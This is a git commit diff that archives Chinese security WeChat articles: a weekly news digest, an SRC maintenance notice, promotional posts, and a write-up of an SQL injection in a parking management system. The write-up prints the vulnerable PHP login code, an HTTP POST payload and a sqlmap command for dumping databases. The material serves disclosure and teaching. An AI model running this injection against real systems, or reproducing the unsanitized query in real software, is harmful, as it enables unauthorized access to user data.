国外某停车管理系统V1.13存在前台SQL注入漏洞、【PoC】威胁行为者在野利用 SAP 漏洞、FreeBuf周报 | 最强防护也难防大语言模型被欺骗;AI生成虚假漏洞报告污染漏洞赏金平台、某OA代码审计之挖掘0day,未公开poc、关于小红书SRC暂停漏洞测试活动的公告、好用的漏洞复现靶机推荐、282G福利大放送!2025黑客、网络安全资料全网最全资料大合集(从0到挖漏洞、打CTF、护网、就业)、

This commit is contained in:
test 2025-05-10 12:34:27 +00:00
parent 9493385449
commit 678567e7df
8 changed files with 566 additions and 4 deletions

View File

@ -13837,5 +13837,12 @@
"https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247497571&idx=1&sn=9ca2dfab23ac7985bbd0170175c7c154&subscene=0": "实战-漏洞挖掘",
"https://mp.weixin.qq.com/s?__biz=MzAwNTgyODU3NQ==&mid=2651132902&idx=1&sn=bdfaec57ddc0a69a2a89a2753a0597fa&subscene=0": "公安部发布等保工作说明函流行AI开发工具曝严重漏洞|一周特辑",
"https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247499624&idx=1&sn=7c645b1f4a16642c32bafc3802d9582a&subscene=0": "从 .NET 代码审计看 ViewState 反序列化漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652069525&idx=4&sn=a0ceb517f0bd46bd1296a5aa917fbf4c&subscene=0": "【安全圈】Cisco IOS XE WLC 中的关键 CVE-2025-20188 (CVSS 10) 缺陷允许远程根部访问"
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652069525&idx=4&sn=a0ceb517f0bd46bd1296a5aa917fbf4c&subscene=0": "【安全圈】Cisco IOS XE WLC 中的关键 CVE-2025-20188 (CVSS 10) 缺陷允许远程根部访问",
"https://mp.weixin.qq.com/s?__biz=Mzg4MTkwMTI5Mw==&mid=2247489726&idx=1&sn=e7e0eb205d84df56195609e87c843a5f": "国外某停车管理系统V1.13存在前台SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247498775&idx=1&sn=29f2b9e85b1798dd90285f151987a509": "【PoC】威胁行为者在野利用 SAP 漏洞",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651320568&idx=2&sn=4f78388dd0e6383e06bfd44e179712a5": "FreeBuf周报 | 最强防护也难防大语言模型被欺骗AI生成虚假漏洞报告污染漏洞赏金平台",
"https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247526287&idx=1&sn=6b71b0ff47c9db7f74c5d92b44ced3d8": "某OA代码审计之挖掘0day未公开poc",
"https://mp.weixin.qq.com/s?__biz=MzkwNDUwNDU0OA==&mid=2247483765&idx=1&sn=43c35400f383276717ac879629f7db49": "关于小红书SRC暂停漏洞测试活动的公告",
"https://mp.weixin.qq.com/s?__biz=Mzg4MTgxNjQwOQ==&mid=2247484866&idx=1&sn=354d8638c29cecc786bb0cb463c2f741": "好用的漏洞复现靶机推荐",
"https://mp.weixin.qq.com/s?__biz=Mzk1NzMwNTM5NQ==&mid=2247485682&idx=1&sn=5907f8b6dea30490048f9168c84cc95c": "282G福利大放送2025黑客、网络安全资料全网最全资料大合集从0到挖漏洞、打CTF、护网、就业"
}

View File

@ -0,0 +1,39 @@
# 282G福利大放送2025黑客、网络安全资料全网最全资料大合集从0到挖漏洞、打CTF、护网、就业
k哥网络安全 2025-05-10 10:26
同学你好,需要全套共
**282G**
的《**网络安全零基础到进阶全套学习大礼包**
》以及
190节
视频教程可以VX**扫描下方二维码免费领取**
怎么领取?
![](https://mmbiz.qpic.cn/mmbiz_jpg/cTD2sB4FXicfowtrNYGf4kGEHFhWbeMhu7t3GgPBZNnicDRc52dh5vIYK18CibViaKLqaBt4Y2jWAgCLsJyu8ZXBQg/640?wx_fmt=jpeg&from=appmsg "")
**👆🏻用微信**
**加上就会给你发**
**无偿分享**
**遇到扫码问题可以私信或评论区找我**
****
坚持学到一两个月之后就能去挖漏洞赚赏金学三四个月之后就能达到CTF对抗赛的技术水平再之后就可以像k哥一样成为一名白帽黑客或是成为一名红客保卫祖国网络就看你自己的了。
![](https://mmbiz.qpic.cn/mmbiz_jpg/cTD2sB4FXiceEw7XXTebYLHMXCfWd35wLjAGtTaL9yiavEE6xBX7YlSakaAfGeKAO0EVBWMDuP2UK0NeFsQNjTGA/640?wx_fmt=jpeg "")
怎么领取?
![](https://mmbiz.qpic.cn/mmbiz_jpg/cTD2sB4FXiceEw7XXTebYLHMXCfWd35wLuYb7wHicibbicyyBZ82rTQVibZGBJa9YA6uqgWLA4MQ7aiaOFkaqGttib19g/640?wx_fmt=jpeg&from=appmsg "")
**👆🏻用微信**
**加上就会给你发**
**无偿分享**

View File

@ -0,0 +1,224 @@
# FreeBuf周报 | 最强防护也难防大语言模型被欺骗AI生成虚假漏洞报告污染漏洞赏金平台
FreeBuf 2025-05-10 10:03
各位 Buffer 周末好以下是本周「FreeBuf周报」我们总结推荐了本周的热点资讯、一周好文保证大家不错过本周的每一个重点
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3icJ1UiaObonmWJbuLyoLXdutZ6T0GL6AXwFA0IHVJ9Tl93JicaeTmN55VJBw0JKrJg4sQXdypbdzqibg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**🤖最强防护也难防大语言模型被欺骗**
**📋AI生成虚假漏洞报告污染漏洞赏金平台**
**📻虚假AI工具通过Facebook广告传播新型Noodlophile窃密木马**
**📧知名勒索软件LockBit遭入侵内部聊天记录数据库遭泄露**
**💻朝鲜黑客实施了史上最大规模加密货币窃取**
**🛜CVE体系若消亡将如何影响网络安全防御格局**
**🧑💻xAI 开发者在 GitHub 泄露 SpaceX、特斯拉等平台专用 API 密钥**
**⌨Kibana原型污染漏洞可导致远程代码执行**
**🧑🤝🧑AI安全工具崛起但人类协作仍是抵御威胁的核心**
**🤝RSA 2025大会12项最具创新性的网络安全产品发布**
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS5NY7KgXpwrAo5WHiaX2SOibeoicce3vxyZozGALjYSLtYPrDiceL0UV2D3A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
###
### 最强防护也难防大语言模型被欺骗
###
AI解决方案供应商常宣称其模型具备防护机制和一致性暗示这些模型不可能出错。但实际上这只是说明企业尝试训练LLM拒绝一系列预设的恶意提示词只能将异常行为概率降低到较小值而非归零。对于全新未见过的提示词LLM是否会拒绝我们无法提前预知。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZehtOB6DlUZxXYHZyeicH2uIacCyErOrkknFwib3l5XWzBE9WLZsmXh7A/640?wx_fmt=jpeg&from=appmsg "")
### AI生成虚假漏洞报告污染漏洞赏金平台
###
###
###
AI伪造漏洞报告冲击赏金计划利用专业术语制造虚假威胁尤其危害资源不足的开源项目。典型案例显示攻击者通过虚构功能骗取赏金专家呼吁加强审核以应对日益增长的AI欺诈风险。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZXKefvvorMXs6dgmyGbnXEC1EQFIhiayoQIViaUqI378hIqlo279icQUqQ/640?wx_fmt=jpeg&from=appmsg "")
###
### 虚假AI工具通过Facebook广告传播新型Noodlophile窃密木马
###
###
###
黑客利用虚假AI平台传播Noodlophile Stealer木马通过Facebook广告诱骗用户下载恶意软件窃取凭证和加密货币并可能部署XWorm。攻击采用多阶段隐蔽渗透提醒用户谨慎下载文件并验证安全性。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZiaOWJe1NZtrzGmkic9KzzU2cKnficWqQlib15VaicD8HHibuUPxQoRTLMoCg/640?wx_fmt=jpeg&from=appmsg "")
###
###
### 知名勒索软件LockBit遭入侵内部聊天记录数据库遭泄露
###
###
###
臭名昭著的LockBit勒索软件组织遭遇重大安全事件。5月7日攻击者篡改了该组织的暗网基础设施并泄露了包含敏感运营细节的完整数据库。此次入侵给这个全球最活跃的勒索软件团伙造成了沉重打击。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZfDSlDCGdDtib0Vzh1JlktgicITchUFWWPYlNPAoZECLNiadVxAO5QJTDg/640?wx_fmt=jpeg&from=appmsg "")
###
###
### 朝鲜黑客实施了史上最大规模加密货币窃取
###
###
###
朝鲜黑客通过入侵macOS开发者环境利用AWS凭证窃取6.25亿美元加密货币展现高超技术协调能力。攻击采用多阶段恶意软件和复杂C2基础设施18天内未被发现凸显朝鲜对金融系统的重大威胁。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZiaAWeTp7iarY3mznQpK9Vy2ibbdtAYubQeWnM7aicTMt6iaeIa9z3Cr3jYQ/640?wx_fmt=jpeg&from=appmsg "")
### CVE体系若消亡将如何影响网络安全防御格局
###
###
###
###
CVE体系是网络安全的核心基准其资金短缺威胁全球防御稳定性影响训练、情报共享与行业协作。需建立长期稳定机制确保漏洞管理的延续性避免威胁情报碎片化与防御能力下降。
![CVE 的图像结果](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZQPwBV30LYKUZocxC2q9OXUumeSFIE8wlBbNkUxZfe35Bic01XZdawTQ/640?wx_fmt=jpeg&from=appmsg "")
### xAI 开发者在 GitHub 泄露 SpaceX、特斯拉等平台专用 API 密钥
###
###
###
###
xAI因开发者误将含API密钥的配置文件上传至GitHub导致特斯拉、SpaceX等内部定制模型权限泄露近两个月暴露密钥管理漏洞凸显AI公司安全机制薄弱问题。
![xAI 的图像结果](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZGibPvUIdVbq0PtrIOFic2hX7Dhnz7ick0Ko4xwic5J3m45FYvxJGbYdHicQ/640?wx_fmt=jpeg&from=appmsg "")
### Kibana原型污染漏洞可导致远程代码执行
###
###
###
###
Elastic发布Kibana高危漏洞CVE-2025-25014CVSS 9.1),攻击者可利用原型污染漏洞通过机器学习/报告接口执行任意代码。影响版本8.3.0-9.0.0建议立即升级至8.17.6/8.18.1/9.0.1或临时禁用相关功能。
![Elastic 8.0 版:在速度、扩展、高相关性和简单性方面开启了一个全新的时代 | Elastic Blog](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR38je6FHRShczOp2uL6RDxoZZboyoTJjJasCmzKJ9eQQfPkAicLuict3EqaOcO47u1I7RpsEXWvianMcw/640?wx_fmt=png&from=appmsg "")
### AI安全工具崛起但人类协作仍是抵御威胁的核心
###
###
###
###
###
AI安全工具无法解决人才短缺问题需跨行业协作应对AI威胁。展会展示创新防御技术但人类智慧仍是终极防线需结合教育培训和风险意识构建网络安全共同体。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZgvickoXwBJ70DebJIwCnicUKQjN7MlyWGCUiaQrtVRstPFFmib8U0Eo0Lg/640?wx_fmt=jpeg&from=appmsg "")
### RSA 2025大会12项最具创新性的网络安全产品发布
###
###
###
###
###
RSA 2025大会涌现12款颠覆性安全产品涵盖AI治理、深度伪造检测、数据防护等领域。AppOmni推出首款SaaS安全MCP服务器AuditBoard发布AI治理方案X-PHY推出90%准确率的深度伪造检测器Huntress升级ITDR与SIEM平台展现新兴企业与巨头同台竞技的创新实力。
![商业会议中观众专注聆听演讲者的场景,画面呈现专业氛围与积极参与者](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZ3ZIna2BVMNV4oxwWwGJ0Z6FjgDtic51eP250d1jOXicrXDJCXnh9jfOg/640?wx_fmt=jpeg&from=appmsg "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS5Ce9OricKgAogLRlHYat9jaelbVESLOylPBnQQrU63TlHEs2zCbdNrKg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**本周好文推荐指数**
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS59ZQ6EsSUehyHWzxq6tIFG5b5TmautNPF3E0YDL2xav0dFmmibp2oT0w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS59ZQ6EsSUehyHWzxq6tIFG5b5TmautNPF3E0YDL2xav0dFmmibp2oT0w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS59ZQ6EsSUehyHWzxq6tIFG5b5TmautNPF3E0YDL2xav0dFmmibp2oT0w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS59ZQ6EsSUehyHWzxq6tIFG5b5TmautNPF3E0YDL2xav0dFmmibp2oT0w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icFibibPIGEfXsibI0C3or4BS59ZQ6EsSUehyHWzxq6tIFG5b5TmautNPF3E0YDL2xav0dFmmibp2oT0w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
###
### 云安全攻防etcd未授权访问及docker api未授权利用
###
###
###
云上的环境一个不得不说的就是编排工具了编排工具用来管理众多的容器节点如果编排工具存在问题那么攻击者就可能获取容器的所有权限。本篇文章以k8s作为编排工具来看两个具体的漏洞以及如何利用这两个漏洞获取系统的权限。
![1746703600_681c94f0942a4e6597950.png!small?1746703601983](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZo278uQSAa0JhBjJRhkkC8d4BzNicz2Dy37Q26p1ic3CBVIXo44LYabcQ/640?wx_fmt=jpeg&from=appmsg "")
###
### 攻防演练手把手教你写溯源技战法
###
###
###
攻防演练,等级分初级,中级跟高级。其中对于中级的要求,是除了基本的监测和研判外,必须还要会一定的应急跟溯源。 
![1746703455_681c945fa1b6aaa22dbf6.png!small?1746703456721](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZCBd8owL9pUSdMHoic1KGZNBEFyP9Hk7RiazgqjzJ1foxllwzvwmIibogQ/640?wx_fmt=jpeg&from=appmsg "")
### 免杀菜鸡如何免杀自己的fscan
###
###
###
###
在日益严格的安全环境下,传统的木马样本很容易被静态分析、行为分析所识别。本文记录我对某 Go 编写的fscan安全工具进行二次开发通过绕过特征、减小体积从而实现较高程度的免杀。
![1746703322_681c93da9e36b881303d0.png!small?1746703323842](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38je6FHRShczOp2uL6RDxoZh1KY3icFdEicmMeGRGicxl0eBhicnmMCyRy0cAMBHGAY9yk89pAKsxeL3Q/640?wx_fmt=jpeg&from=appmsg "")
### 推荐阅读
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651320090&idx=1&sn=cb1b7e4d9fbfa8c98cf0c378da407981&scene=21#wechat_redirect)
### 电台讨论
[]()
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif "")

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,25 @@
# 关于小红书SRC暂停漏洞测试活动的公告
原创 小红书SRC 小红书安全响应中心 2025-05-10 03:03
尊敬的各位白帽子们:
小红书安全响应中心自上线以来得到了广大白帽子的踊跃参与支持小红书SRC在此表示真诚的感谢! 
为了提供更好的服务及使用体验小红书SRC平台将于 
2025年5月12日-
2025年5月30日进行改版与系统升级平台在此期间将暂停服务请各位白帽子请勿在此期间进行漏洞测试。平台将计划于
6月1日重新上线和恢复漏洞测试活动如有变动将另行通知。各位白帽们4月份兑换的现金奖励与实物礼品平台将在本月20日完成发放。 
在此期间,
对于恶意网络攻击的行为,公司将保留追究法律责任的权利。
如有高风险漏洞和高价值安全情报提交,欢迎通过
sec@xiaohongshu.com邮箱进行提交我们将对高风险的漏洞、安全情报给予相应奖励。
感谢大家的支持与配合,我们将在系统升级后,提供更加优质的漏洞提交体验~
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/ZRia2mL0OOO1rnQcVNwvNevTrAibu1YRAqe35sVbicYRRRYgDCXzNrN3GNJHBd4yF9fhLPCULibDr9Q94SRchZ0Tiaw/640?wx_fmt=jpeg&from=appmsg "")

View File

@ -0,0 +1,88 @@
# 国外某停车管理系统V1.13存在前台SQL注入漏洞
原创 Mstir 星悦安全 2025-05-10 08:22
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
点击上方
蓝字
关注我们 并设为
星标
## 0x00 前言
车辆停车管理系统是一种基于 Web 的技术,它将管理停车场进出车辆的记录。如果车辆已被访问,管理员很容易检索数据,他可以通过号码获取该数据。车辆停车管理系统是一种自动系统,以非常高的速度提供数据处理.
![VPMS Home Page](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5e1rpUApFqPvLMBjiaM0gy78ibQZK7h3SVGusTCO7ruvQ2iaCTeSHLhKs74Jk5AQf7afdM9IjMRL2h7Q/640?wx_fmt=png&from=appmsg "")
![VPMS - Admin Dashboard](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5e1rpUApFqPvLMBjiaM0gy78Od0fOZiaHayBeyUkHwtXgvENOuKaxUNqItPvzX00XibYHoxsWmY5hCGA/640?wx_fmt=png&from=appmsg "")
📍 漏洞由星群漏洞库检索发现 
📍
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5c0pnVOIEDyfcqFT9sz1KBBs2D24FMOk24PuswdicY86zibuH2KhS2ic4Ovpgg9p4BLBnBNSWvYnAVyg/640?wx_fmt=png&from=appmsg "")
## 0x01 漏洞分析&复现
位于 
/users/login.php 中通过POST传入 
emailcont 参数后直接被带入到SQL查询字句中且未加过滤导致漏洞产生。```
<?php
session_start();
//error_reporting(0);
include('includes/dbconnection.php');
if(isset($_POST['login']))
  {
    $emailcon=$_POST['emailcont'];
    $password=md5($_POST['password']);
    $query=mysqli_query($con,"select ID,MobileNumber from tblregusers where  (Email='$emailcon' || MobileNumber='$emailcon') && Password='$password' ");
    $ret=mysqli_fetch_array($query);
    if($ret>0){
      $_SESSION['vpmsuid']=$ret['ID'];
      $_SESSION['vpmsumn']=$ret['MobileNumber'];
     header('location:dashboard.php');
    }
    else{
  
    echo "<script>alert('Invalid Details.');</script>";
    }
  }
  ?>
```
Payload:```
POST /vms/vpms/users/login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fts8bkugo602dkngvre7tbqn6t
Host: 192.168.65.5:8080
Origin: http://192.168.65.5:8080
Referer: http://192.168.65.5:8080/vms/vpms/users/login.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
emailcont=1234567890*&password=1*&login=
```
sqlmap -r sql.txt --batch --risk 3 --level 5 --dbs
![image-20250409135424612](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5e1rpUApFqPvLMBjiaM0gy78EdgZkH7k56icKiceIWXWmDXRcbxWjkBB3qmib2TMYPbbZwzHkfS8P5HZA/640?wx_fmt=png&from=appmsg "")
## 0x02 源码下载
**标签:代码审计0day渗透测试系统通用0day闲鱼转转**
**停车管理系统关注公众号,发送 250510 获取!**
     有审计上或者漏洞相关的问题可以加下方小助理私信询问代码审计课程第二期知识星球CISP-PTE 等证书,等相关事宜也可私信,全网低价.
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5e1rpUApFqPvLMBjiaM0gy781Ce9lpvibVO8y8wA4RT3h6TQibpm718QQeUB8pVZ6SOJ6FZnmIhHIuyg/640?wx_fmt=jpeg&from=appmsg "")
**免责声明:****文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!**

View File

@ -0,0 +1,33 @@
# 好用的漏洞复现靶机推荐
web安全小白 web安全小白 2025-05-10 11:56
推荐理由
1.靶场无需本地搭建,即可进行漏洞复现
2.不需要VPS就能接受到反弹的shell
3.每一个靶机都有对应的复现文章,解决不会漏洞复现的问题
4.靶机的总类丰富除了常见的CVE以外还有常见的Vulnhub Labs
靶机地址https://app.nextcyber.cn/
vpn地址https://openvpn.net/client/
添加平台客服时备注websec即可领取3天体验会员足够大家体验以及复现各种常见的漏洞。兄弟们可以冲冲冲漏洞复现起来
详情示例
![](https://mmbiz.qpic.cn/mmbiz_png/HOYhLLAPjoSRdb654N76yHpFSq9KE9rhTL08slZBaQaCtnGSDs9Z9IfAzwWRAKxicxQcCzuF1Hcer9k1NiajRPUw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/HOYhLLAPjoSRdb654N76yHpFSq9KE9rhDicqIP6LOPUKu7botuLTagM1mnBRUPf37fVURibVZnFTf5ZEaav2af2w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/HOYhLLAPjoSRdb654N76yHpFSq9KE9rhiazIbuT9P6GOPaSlempCdo0pOMKnicKClTf85fQCPGasbOia7JT5EH0jg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/HOYhLLAPjoSRdb654N76yHpFSq9KE9rhYCfVzEsho10gdwTA4slMcSIiaRia5b4nye6V7rQtvrla5kX555PzPumw/640?wx_fmt=png&from=appmsg "")

View File

@ -1,5 +1,5 @@
# 某OA代码审计之挖掘0day未公开poc
我不懂安全 2025-05-08 12:59
乌雲安全 2025-05-10 03:58
参与的众测项目,资产非常难挖掘漏洞,所以只能通过审计的方式,找找漏洞点
@ -82,7 +82,6 @@ portalweb-datasource.jsp则是前端的文件后端也会存在对应的路
 
直接对应了接口名称,往下跟,就到了数据库层面了
```
   @Override
   public List<TblPortalwbConTemplete> getAllTemplates(String typeFlag) {
@ -94,7 +93,6 @@ portalweb-datasource.jsp则是前端的文件后端也会存在对应的路
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BAby4Fk1HQaHNMcUhPPqY7T6OdSeg5awClVkJGh4QC8Go6xkrYbK3EbQPLf1dFJl5euNmm40tWAyzwnd98EsAg/640?wx_fmt=png "")